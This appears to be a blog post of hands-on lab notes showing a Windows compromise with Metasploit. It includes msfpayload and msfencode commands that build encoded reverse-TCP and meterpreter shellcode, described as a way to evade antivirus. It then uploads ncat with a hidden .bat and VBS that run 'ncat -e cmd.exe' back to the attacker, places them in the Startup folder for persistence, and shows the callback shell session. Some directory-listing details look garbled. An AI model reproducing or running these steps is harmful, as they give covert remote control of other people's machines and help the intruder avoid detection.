I’ve been locked away working for long periods without socializing.

MyExploit has been busy in the lab, here are working notes on what were upto. Some will understand, most wont. 24 months back we wouldn’t, please ask questions.

Welcome the start of the game changer!

\x00\x0a\x0d

\x00 = zero byte

\x0a = Line feed

\x0d = Carriage return

Avoid address with zero byte (\x00)
String Terminator in C and it breaks exploits

Avoid Line Feed (\x0a)
It breaks exploits

Avoid Carriage Return (\x0d)
Do you sense a common theme?

Use msfencode which takes raw shellcode and generates an encoded version without the bad characters

msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 R | msfencode -a x86 -b ‘\x00\x0a\x0d’ -t c

msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode

root@bt:~# msfpayload -h

Usage: /opt/metasploit-4.1.4/msf3/msfpayload [] [var=val]

———————————-

encoders

root@bt:~# msfencode -l -a x86

Framework Encoders (architectures: x86)
=======================================

Name Rank Description
—- —- ———–
generic/none normal The “none” Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

root@bt:~# msfencode -h

Usage: /opt/metasploit-4.1.4/msf3/msfencode

OPTIONS:

-a The architecture to encode as
-b The list of characters to avoid: ‘\x00\xff’
-c The number of times to encode the data
-d Specify the directory in which to look for EXE templates
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net
-v Increase verbosity
-x Specify an alternate executable template

msfpayload windows/meterpreter/reverse_tcp LHOST=ip-address LPORT=4445 of choice R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b ‘\x00\x0a\x0d’ -c 1 x>/var/www/share/myexploit.bin

windows/meterpreter/reverse_tcp = Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)

-e = The encoder to use. for this example we used x86/shikata_ga_nai

x86/shikata_ga_nai = Polymorphic XOR Additive Feedback Encoder In computer terminology, polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact. That is, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence.
Most anti-virus software and intrusion detection systems (IDS) attempt to locate malicious code by searching through computer files and data packets sent over a computer network. If the security software finds patterns that correspond to known computer viruses or worms, it takes appropriate steps to neutralize the threat. Polymorphic algorithms make it difficult for such software to recognise the offending code because it constantly mutates.

-t = The output format. for this example we used raw

-a = The architecture to encode as example used x86 (Intel microprocessor architecture also works with AMD)

-b = The list of characters to avoid: ‘\x00\x0a\x0d’

-c = The number of times to encode the data. Example uses x 1.

-x = Specify an alternate executable template. Example pipes the finalized .bin file to folder /var/www/share/

———————————–

Uploading netcat using port 80 to make the host dial back. To make this work we shut down apache (http server) as this service was
used to start the attack.

meterpreter > upload /root/nmap/ncat.exe C:\
[*] uploading : /root/nmap/ncat.exe -> C:\
[*] uploaded : /root/nmap/ncat.exe -> C:\\ncat.exe

meterpreter > upload /root/nmap/nc.bat C:\
[*] uploading : /root/nmap/nc.bat -> C:\
[*] uploaded : /root/nmap/nc.bat -> C:\\nc.bat

meterpreter > upload /root/nmap/VBS.vbs C:\
[*] uploading : /root/nmap/VBS.vbs -> C:\
[*] uploaded : /root/nmap/VBS.vbs -> C:\\VBS.vbs

The .bat file uploaded.

@echo off
start /B C:\ncat.exe -v 192.168.1.4 80 -e cmd.exe

(saved as a .bat)

/B = Start application without creating a new window.

The .vbs file uploaded – This is to make the bat file run invisibly

Set WshShell = CreateObject(“WScript.Shell” )
WshShell.Run chr(34) & “C:\nc.bat” & Chr(34), 0
Set WshShell = Nothing

(saved as a .vbs file)

meterpreter > execute -f cmd.exe -c
Process 3456 created.
Channel 4 created.
meterpreter > interact 4
Interacting with channel 4…

Microsoft Windows XP [Version 5
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test\Desktop\Test2>cd c:\
cd c:\

C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0042-5616

Directory of C:\

31/01/2011 17:35 0 AUTOEXEC.BAT
31/01/2011 17:35 0 CONFIG.SYS
13/09/1972 11:37 Documents and Settings
25/06/1972 17:19 Inetpub
24/09/1972 16:54 43 nc.bat
24/09/1972 15:43 186,880 ncat.exe
10/09/1972 14:15 Program Files
24/09/1972 16:54 116 VBS.vbs
24/09/1972 15:37 WINDOWS
16/08/1972 09:10 xampp
2008 File(s) 800,000 bytes
2008 Dir(s) 25,000,000 bytes free

Move the .vbs startup file from C to the Startup folder.

C:\>move c:\VBS.vbs “C:\Documents and Settings\test\Start Menu\Programs\Startup”

Reboot PC

C:\Documents and Settings\test\Desktop\Test2>shutdown -r -t 0
shutdown -r -t 0

C:\Documents and Settings\test\Desktop\Test2>
[*] 192.168.1.2 – Meterpreter session 4 closed. Reason: Died

Stop Apache

Once a person logs into Windows it triggers the .vbs file that starts up C:\ncat.exe -v 192.168.1.4 80 -e cmd.exe

root@bt:~# nc -lvvp 80
listening on [any] 80 …
192.168.1.2: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.4] from (UNKNOWN) [192.168.1.2] 1027
Microsoft Windows XP [Version 5
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\11>

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s